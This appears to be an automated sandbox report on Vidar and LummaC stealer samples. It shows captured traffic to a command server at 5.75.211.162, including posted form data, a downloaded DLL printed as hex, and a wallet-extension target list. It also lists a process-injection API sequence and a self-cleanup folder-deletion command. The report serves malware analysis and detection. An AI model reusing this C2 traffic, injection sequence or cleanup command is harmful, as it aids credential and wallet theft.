2024-09-26 20:57:35 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49787	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:36 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKJDAFHJDGDHJKKEGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6197 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:36 UTC	6197	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 36 65 65 39 63 31 35 64 61 37 65 31 63 33 31 31 32 65 65 36 66 35 37 66 32 33 36 39 66 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="token"26ee9c15da7e1c3112ee6f57f2369ff0------JEBKJDAFHJDGDHJKKEGIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JEBKJDAFHJDGDHJKKEGICont
2024-09-26 20:57:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49788	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:37 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:38 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:37 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 20:57:37 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 20:57:38 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 20:57:38 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49789	5.75.211.162	443	2256	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 20:57:41 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 20:57:41 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 36 65 65 39 63 31 35 64 61 37 65 31 63 33 31 31 32 65 65 36 66 35 37 66 32 33 36 39 66 66 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="token"26ee9c15da7e1c3112ee6f57f2369ff0------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GDBFHDHJKKJDHJJJJKEGCont
2024-09-26 20:57:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 20:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 20:57:41 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	16:55:58
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x2f0000
File size:	413'224 bytes
MD5 hash:	1992187CFDD036A0EECB8F5CA9340CC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1680508466.0000000003725000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:55:58
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:55:58
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x640000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:55:58
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xbb0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:57:00
Start date:	26/09/2024
Path:	C:\ProgramData\CBFBKFIDHI.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\CBFBKFIDHI.exe"
Imagebase:	0xca0000
File size:	385'064 bytes
MD5 hash:	16F5B27C9E1376C17B03BF8C5090DB3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000007.00000002.2304480133.00000000040B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:57:00
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x740000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:57:00
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xeb0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000009.00000002.2410755842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:57:04
Start date:	26/09/2024
Path:	C:\ProgramData\KJEHJKJEBG.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\KJEHJKJEBG.exe"
Imagebase:	0x780000
File size:	413'224 bytes
MD5 hash:	2CCE29D734EA1D227B338834698E2DE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:57:05
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:57:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x5e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:57:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd70000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:57:08
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAECFHJEBAAF" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:57:08
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:57:09
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x6b0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	37.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	29.6%
Total number of Nodes:	27
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0272212D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0272209F,0272208F), ref: 0272229C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027222AF
Wow64GetThreadContext.KERNEL32(00000034,00000000), ref: 027222CD
ReadProcessMemory.KERNELBASE(00000094,?,027220E3,00000004,00000000), ref: 027222F1
VirtualAllocEx.KERNELBASE(00000094,?,?,00003000,00000040), ref: 0272231C
TerminateProcess.KERNELBASE(00000094,00000000), ref: 0272233B
